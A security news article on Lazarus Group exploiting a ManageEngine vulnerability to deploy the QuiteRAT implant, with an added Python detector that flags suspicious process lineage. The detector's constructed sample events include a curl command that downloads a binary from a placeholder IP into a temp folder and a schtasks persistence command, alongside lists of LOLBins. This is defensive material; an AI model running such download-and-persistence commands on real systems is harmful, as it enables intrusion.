The North Korean state-sponsored actor Lazarus Group recently started a new campaign targeting internet backbone infrastructure and healthcare entities in Europe and the US, security researchers from Cisco Talos have found.
The researchers said that the attackers began exploiting a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) in January 2023, only five days after it was disclosed.
The vulnerability is rated critical, with a CVSS score of 9.8/10 and a Kenna risk score of 100/100.
The threat actors used the exploit to gain initial access. Successful exploitation triggered the immediate download and execution of a malicious binary via the Java runtime process (the exploited ManageEngine product runs on Java), activating the implant on the infected server. Cisco Talos named this binary QuiteRAT and assesses it to be a variant of the group's MagicRAT malware.
First observed in February by WithSecure, QuiteRAT had stayed under the radar until now. Like MagicRAT, QuiteRAT is built on the Qt framework, a free, open-source, cross-platform framework for building applications, and includes capabilities such as arbitrary command execution.
QuiteRAT is, however, much smaller: 4 to 5MB compared with MagicRAT's 18MB.
“This substantial difference in size is due to Lazarus Group incorporating only a handful of required Qt libraries into QuiteRAT, as opposed to MagicRAT, in which they embedded the entire Qt framework,” reads the analysis, published on August 24, 2023.
Once the implant starts running, it sends preliminary system information to its command-and-control (C&C) servers. It then waits for the C&C to respond with either a command code or a Windows command, which it executes on the endpoint via a child cmd.exe process.
“While MagicRAT consists of persistence mechanisms implemented in it via the ability to set up scheduled tasks, QuiteRAT does not have a persistence capability and needs to be issued one by the C&C server to achieve continued operation on the infected endpoint,” the researchers added.
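The chain described above (the ManageEngine host's Java process downloading and executing a binary, the implant running operator commands through a child cmd.exe, and persistence arriving only later as a C&C-issued command) maps directly onto process-lineage detection. The following Python is an added example and is not code from Cisco Talos or from the article; the Sysmon-style process-creation records, the ManageEngine install path, the address 198.51.100.7, the file name svc.exe and the rule names are all constructed for illustration.

```python
"""Process-lineage checks over constructed process-creation events.

Three patterns are flagged, mirroring the chain in the report:
  1. a java.exe parent spawning a shell/LOLBin or a binary from a drop directory
  2. a binary running from a drop directory spawning cmd.exe (operator commands)
  3. a persistence command (schtasks /create, reg add ...\\Run) anywhere under a
     java.exe ancestor, since the implant has no persistence of its own
Event fields, paths and rule names are assumptions, not from the report.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # its command line


# Assumed heuristics: children a ServiceDesk Java runtime should never have.
SHELLS_AND_LOLBINS = {"cmd.exe", "powershell.exe", "certutil.exe", "curl.exe",
                      "bitsadmin.exe", "mshta.exe", "rundll32.exe"}
PERSISTENCE_RE = re.compile(
    r"schtasks(\.exe)?\s+/create|reg(\.exe)?\s+add\s+.*\\run\b", re.I)
DROP_DIR_RE = re.compile(
    r"\\(windows\\temp|users\\[^\\]+\\appdata\\local\\temp|programdata)\\", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_java(e: ProcEvent) -> bool:
    return basename(e.image) == "java.exe"


def ancestors(tree: dict, pid: int):
    """Walk parent links upward; the seen-set guards against pid reuse loops."""
    seen = set()
    cur = tree.get(pid)
    while cur is not None and cur.ppid in tree and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = tree[cur.ppid]
        yield cur


def detect(events: list) -> list:
    """Return (pid, rule_name) tuples, in event order."""
    tree = {e.pid: e for e in events}
    alerts = []
    for e in events:
        parent = tree.get(e.ppid)
        name = basename(e.image)
        if parent is not None and is_java(parent):
            if name in SHELLS_AND_LOLBINS:
                alerts.append((e.pid, "java_spawns_shell"))
            elif DROP_DIR_RE.search(e.image):
                alerts.append((e.pid, "java_executes_dropped_binary"))
        elif parent is not None and name == "cmd.exe" and DROP_DIR_RE.search(parent.image):
            alerts.append((e.pid, "shell_from_dropped_binary"))
        if PERSISTENCE_RE.search(e.cmdline) and any(is_java(a) for a in ancestors(tree, e.pid)):
            alerts.append((e.pid, "persistence_under_java_lineage"))
    return alerts


# Constructed sample: one benign shell plus the exploitation chain.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\System32\services.exe", "services.exe"),
    ProcEvent(400, 100, r"C:\Program Files\ManageEngine\ServiceDesk\jre\bin\java.exe",
              "java.exe -Xmx2g ..."),
    ProcEvent(500, 400, r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c curl http://198.51.100.7/svc.exe -o C:\Windows\Temp\svc.exe"),
    ProcEvent(600, 400, r"C:\Windows\Temp\svc.exe", r"C:\Windows\Temp\svc.exe"),
    ProcEvent(700, 600, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcEvent(800, 600, r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c schtasks /create /tn Updater /tr C:\Windows\Temp\svc.exe /sc onlogon"),
    ProcEvent(900, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
]


def run_sample() -> list:
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for pid, rule in run_sample():
        print(f"pid {pid}: {rule}")
```

The persistence rule deliberately looks at lineage rather than at the immediate parent: because QuiteRAT has no persistence of its own, the scheduled-task command arrives from the operator and is executed two hops below the Java process, so a parent-only rule would miss it. The benign cmd.exe under services.exe produces no alert.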
This is the third documented campaign attributed to the Lazarus Group since the beginning of 2023, with the actor reusing the same infrastructure throughout these operations.
The exploited vulnerability, affecting multiple products of Zoho-owned ManageEngine, is now awaiting reanalysis.
The same day Cisco Talos’ analysis was published, the FBI warned cryptocurrency firms about a surge in blockchain activity linked to the theft of hundreds of millions in digital currency attributed to the Lazarus Group.